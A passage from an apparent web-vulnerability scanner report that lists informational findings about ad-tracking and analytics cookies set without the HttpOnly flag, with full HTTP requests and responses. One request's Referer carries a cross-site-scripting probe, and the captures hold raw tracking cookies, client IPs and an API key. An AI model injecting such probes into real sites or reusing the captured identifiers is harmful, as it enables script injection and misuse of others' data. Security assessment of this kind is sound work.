HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:32:13 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"Set-Cookie: bh="b!!!#O!!-C,!!!!%=3`c_!!-O3!!!!#=3G@^!!1CB!!!!#=3_%L!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!#=3f8T!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!sXC!!!!#=3f:p!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8TD!!!!#=3*$x!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gZi!#RY.!!!!%=3H5P!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#]W%!!!!%=3H5P!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#tCn!!!!%=3H5P!#tK$!!!!%=3H5P!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*Q<!!!!%=3H5P!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$/iQ!!!!%=3H5P!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3jT!!!!%=3H5P!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$5Nu!!!!%=3H5P!$5oO!!!!%=3H5P!$5qE!!!!%=3H5P!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$:Py!!!!%=3H5P!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s@!!!!$=3H5P!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!$=3f9)!$?i5!!!!%=3`c_"; path=/; expires=Thu, 05-Sep-2013 15:32:13 GMT Set-Cookie: BX=ei08qcd75vc4d&b=3&s=8s&t=246; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT Cache-Control: no-store Last-Modified: Tue, 06 Sep 2011 15:32:13 GMT Pragma: no-cache Content-Length: 43 Content-Type: image/gif Age: 0 Proxy-Connection: close GIF89a.............!.......,...........D..;
13.64. http://ads.pointroll.com/PortalServe/
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ads.pointroll.com
Path:
/PortalServe/
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;; PRimp=47AC0400-C30A-57B3-020A-1BB000220100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; PRca=|AKln*9320:4|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; PRcp=|AKlnAC0U:4|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; PRpl=|FrlJ:4|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; PRcr=|GW7X:4|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; PRpc=|FrlJGW7X:4|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /PortalServe/?pid=1398295G52620110830164853&pub=IC13501&flash=10&time=2|14:57|-5&redir=http://a1.interclick.com/icaid/192677/tid/1ff795b7-a8cc-487d-bdd1-056be6aa440f/click.ic?$CTURL$&pos=x&dom=http://search.cnbc.com&r=0.07496926933526993 HTTP/1.1 Host: ads.pointroll.com Proxy-Connection: keep-alive Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339024254&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2F User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PRID=FC84F463-F810-4805-B5C6-DA875B835084; PRbu=ErB40RtCA; PRvt=CBJ9xErENUwPwYAcUBBe; PRgo=BBBAAsJvBBVBF4FR; PRimp=47AC0400-3F06-2A6D-020A-1BB000220100; PRca=|AKln*9320:2|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#; PRcp=|AKlnAC0U:2|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#; PRpl=|FrlJ:2|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#; PRcr=|GW7X:2|GV2B:1|GV12:2|GSur:3|#; PRpc=|FrlJGW7X:2|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 06 Sep 2011 14:57:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC" Cache-Control: no-cache Content-type: text/html Content-length: 4496Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;; Set-Cookie:PRimp=47AC0400-C30A-57B3-020A-1BB000220100; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; Set-Cookie:PRca=|AKln*9320:4|AKgy*39173:1|AKfq*9:2|AKcV*1774:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; Set-Cookie:PRcp=|AKlnAC0U:4|AKgyAKLp:1|AKfqAAQ0:1|AKfqAAAJ:1|AKcVAA2c:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; Set-Cookie:PRpl=|FrlJ:4|Fqr0:1|Fqqc:1|Fqqq:1|Fhqf:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; Set-Cookie:PRcr=|GW7X:4|GV2B:1|GV12:2|GSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; Set-Cookie:PRpc=|FrlJGW7X:4|Fqr0GV2B:1|FqqcGV12:1|FqqqGV12:1|FhqfGSur:3|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT; var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef...[SNIP]...
13.65. http://ads.rnmd.net/getAds
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://ads.rnmd.net
Path:
/getAds
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:personCookie=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8; Expires=Wed, 05-Sep-2012 15:07:48 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /getAds?delivery=jsonp&adType=banner&adDiv=rnmdad&appId=cnbc_web&t=other,OFFDECK&w=300&h=50&v=1&ck=1315339668282 HTTP/1.1 Host: ads.rnmd.net User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://m.cnbc.com/mytestc3e92%27-prompt(document.location)-%27f261e685920/ipecho.php
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:07:47 GMT Server: Apache-Coyote/1.1 Cache-Control: no-cache x-rnmd-pc: 208.91.189.56 Content-Type: application/x-javascript Content-Length: 665Set-Cookie: personCookie=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8; Expires=Wed, 05-Sep-2012 15:07:48 GMT Connection: close net.rnmd.sdk._private.JsonHelper.completeRequest({"personCookie":"208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8","adDiv":"rnmdad","htmlPayload":"<div style=\"text-align: center\">\r\n<a href=\"ht...[SNIP]...
13.66. http://api.bizographics.com/v1/profile.redirect
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://api.bizographics.com
Path:
/v1/profile.redirect
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KV1QisJqhCw3Caj5XcunNcMDa7Re6IGD4lAPKWdnq4jBRAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtS8UYaNROq1hKa5pT7PlEtIEVUJBxdqAyA9AgipxBis0MPBYw4RisMnVT081fJFlZ0k4MipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /v1/profile.redirect?api_key=798c7ba2e6b04aec86d660f36f6341a5&callback_url=http://rt.legolas-media.com/lgrt?ci=1%26ei=21%26ti=95%26vi=11%26sti=28%26sei=0%26sci=0%26sai=0%26smi=0%26pbi=0%26sts=1315321124004408%26sui=fb069b82-5953-4473-8ae5-0a80415bcdc8 HTTP/1.1 Host: api.bizographics.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KZAAQ0nYgPzjaj5XcunNcMDa7Re6IGD4lIaN8iioqfwkiiAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtQ9FMNe8GIqf5OfgZsnbA3YEVUJBxdqAyBEYneLAL1RICIFxuwxR1V0fFw8K2uMipCEipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie
Response
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache Date: Tue, 06 Sep 2011 15:00:30 GMT Location: http://rt.legolas-media.com/lgrt?ci=1&ei=21&ti=95&vi=11&sti=28&sei=0&sci=0&sai=0&smi=0&pbi=0&sts=1315321124004408&sui=fb069b82-5953-4473-8ae5-0a80415bcdc8&industry=business_services&location=texas P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 Set-Cookie: BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KV1QisJqhCw3Caj5XcunNcMDa7Re6IGD4lAPKWdnq4jBRAd6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtS8UYaNROq1hKa5pT7PlEtIEVUJBxdqAyA9AgipxBis0MPBYw4RisMnVT081fJFlZ0k4MipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQIisw5G2fpQUiijDgwqyIJliiyiifMpisISaMCen8ipAXyH4EipFU1j1pb0p5PrRoMiimMtzfQie;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000 X-Bizo-Usage: 1 Content-Length: 0 Connection: keep-alive
13.67. http://api.twitter.com/1/statuses/user_timeline.json
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://api.twitter.com
Path:
/1/statuses/user_timeline.json
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:guest_id=v1%3A131532875890927681; domain=.twitter.com; path=/; expires=Fri, 06 Sep 2013 05:05:58 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /1/statuses/user_timeline.json HTTP/1.1 Host: api.twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 401 Unauthorized Date: Tue, 06 Sep 2011 17:05:58 GMT Server: hi Status: 401 Unauthorized WWW-Authenticate: OAuth realm="http://api.twitter.com" X-Transaction: 1315328758-6109-39893 X-RateLimit-Limit: 150 X-Frame-Options: SAMEORIGIN Last-Modified: Tue, 06 Sep 2011 17:05:58 GMT X-RateLimit-Remaining: 148 X-Runtime: 0.00626 Content-Type: application/json; charset=utf-8 Content-Length: 94 Pragma: no-cache X-RateLimit-Class: api X-Content-Type-Options: nosniff X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 X-MID: 7b997ce2b49ff6792faaf34e1fe6d8827fe21243 X-RateLimit-Reset: 1315332358Set-Cookie: guest_id=v1%3A131532875890927681; domain=.twitter.com; path=/; expires=Fri, 06 Sep 2013 05:05:58 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH00Xj8yAToHaWQiJTUyNTA5ZjQ3YzU2NjU3%250ANDczMjkwZTE4ZjM0ODEyNmJjIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--356f1bbdd959d20fe46289e9da9efb4258cc6a16; domain=.twitter.com; path=/; HttpOnly Vary: Accept-Encoding Connection: close {"error":"This method requires authentication.","request":"\/1\/statuses\/user_timeline.json"}
13.68. http://b.scorecardresearch.com/b
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://b.scorecardresearch.com
Path:
/b
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 05-Sep-2013 14:56:57 GMT; path=/; domain=.scorecardresearch.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /b?c1=2&c2=1000004&c3=&c4=&c5=&c6=&c10=&c15=&c16=&r=&ns__t=1315339017162&ns_c=UTF-8&c8=Stock%20Market%20News%2C%20Business%20News%2C%20Financial%2C%20Earnings%2C%20World%20Market%20News%20and%20Information%20-%20CNBC&c7=http%3A%2F%2Fwww.cnbc.com%2F&c9=http%3A%2F%2Fsearch.cnbc.com%2Fmain.do%3Fkeywords%3Dxss%26sort%3Ddate%26minimumrelevance%3D0.2%26source%3D(The%2520Associated%2520Press%2520OR%2520Reuters%2520OR%2520AFX%2520OR%2520The%2520New%2520York%2520Times%2520OR%2520CNBC.COM)%26layout%3DNoPic%26pubtime%3D0%26pubfreq%3Dh HTTP/1.1 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://www.cnbc.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: UID=9951d9b8-80.67.74.150-1314793633
Response
HTTP/1.1 204 No Content Content-Length: 0 Date: Tue, 06 Sep 2011 14:56:57 GMT Connection: closeSet-Cookie: UID=9951d9b8-80.67.74.150-1314793633; expires=Thu, 05-Sep-2013 14:56:57 GMT; path=/; domain=.scorecardresearch.com P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Pragma: no-cache Expires: Mon, 01 Jan 1990 00:00:00 GMT Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS
13.69. http://c.statcounter.com/t.php
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://c.statcounter.com
Path:
/t.php
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323346.0; expires=Sun, 04-Sep-2016 15:35:46 GMT; path=/; domain=.statcounter.com The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /t.php?sc_project=3776433&resolution=1920&h=1200&camefrom=&u=http%3A//www.resourcepoint.net/&t=Resource%20Point%20%E2%80%93%20Experts%20in%20eCommerce%2C%20portal%20development%20%26%20content%20management&java=1&security=f2e27155&sc_random=0.36302077560685575&sc_snum=1&invisible=1 HTTP/1.1 Host: c.statcounter.com Proxy-Connection: keep-alive Referer: http://www.resourcepoint.net/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 15:35:46 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.2.10 P3P: policyref="http://www.statcounter.com/w3c/p3p.xml", CP="ADMa OUR COM NAV NID DSP NOI COR" Expires: Mon, 26 Jul 1997 05:00:00 GMTSet-Cookie: is_unique=sc3764952.1314892318.0-5287654.1314894061.0-3776433.1315323346.0; expires=Sun, 04-Sep-2016 15:35:46 GMT; path=/; domain=.statcounter.com Content-Length: 49 Connection: close Content-Type: image/gif GIF89a...................!.......,...........T..;
13.70. http://clk.fetchback.com/serve/fb/click
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://clk.fetchback.com
Path:
/serve/fb/click
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ cre=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ clk=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /serve/fb/click HTTP/1.1 Host: clk.fetchback.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:22 GMT Server: Apache/2.2.3 (CentOS)Set-Cookie: uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: cre=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: clk=1_1315328782; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Tue, 06 Sep 2011 17:06:22 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 2
13.71. http://clk.fetchback.com/serve/fb/engmnt
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://clk.fetchback.com
Path:
/serve/fb/engmnt
Issue detail
The following cookies were issued by the application and do not have the HttpOnly flag set:uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ eng=1_1315328782_20056:1658183; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /serve/fb/engmnt HTTP/1.1 Host: clk.fetchback.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Tue, 06 Sep 2011 17:06:22 GMT Server: Apache/2.2.3 (CentOS)Set-Cookie: uid=1_1315328782_1315323865378:5830425253751405; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: eng=1_1315328782_20056:1658183; Domain=.fetchback.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Cache-Control: max-age=0, no-store, must-revalidate, no-cache Expires: Tue, 06 Sep 2011 17:06:22 GMT Pragma: no-cache P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 2
13.72. http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://d.adroll.com
Path:
/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:__adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/4X7ERY5MVFDBLHMTRJRP2G HTTP/1.1 Host: d.adroll.com Proxy-Connection: keep-alive Referer: http://www.shopify.com/?gclid=CK6YvLv4iKsCFSE8gwod-iiK3g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __adroll=a93684bbe302491756ff3d9c64c60001
Response
HTTP/1.1 302 Moved Temporarily Server: nginx/0.8.54 Date: Tue, 06 Sep 2011 15:32:13 GMT Connection: keep-aliveSet-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/ Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com/i/blank.gif Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate
13.73. http://d.adroll.com/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/RFYZ2NEPUVBUFENBCOH6GL
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://d.adroll.com
Path:
/check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/RFYZ2NEPUVBUFENBCOH6GL
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:__adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/ The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /check/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO/RFYZ2NEPUVBUFENBCOH6GL HTTP/1.1 Host: d.adroll.com Proxy-Connection: keep-alive Referer: http://www.shopify.com/examples User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __adroll=a93684bbe302491756ff3d9c64c60001
Response
HTTP/1.1 302 Moved Temporarily Server: nginx/0.8.54 Date: Tue, 06 Sep 2011 15:34:07 GMT Connection: keep-aliveSet-Cookie: __adroll=a93684bbe302491756ff3d9c64c60001; Version=1; Expires=Mon, 09 Sep 2013 07:00:00 GMT; Max-Age=432000000; Path=/ Pragma: no-cache P3P: CP='NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV' Location: http://a.adroll.com/i/blank.gif Content-Length: 0 Cache-Control: no-store, no-cache, must-revalidate
13.74. http://d.adroll.com/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://d.adroll.com
Path:
/pixel/EBPLYDUJ5RCZ3C7MBENLBV/3CUMSMM7PFGSTPKIXDFOOO
Issue detail
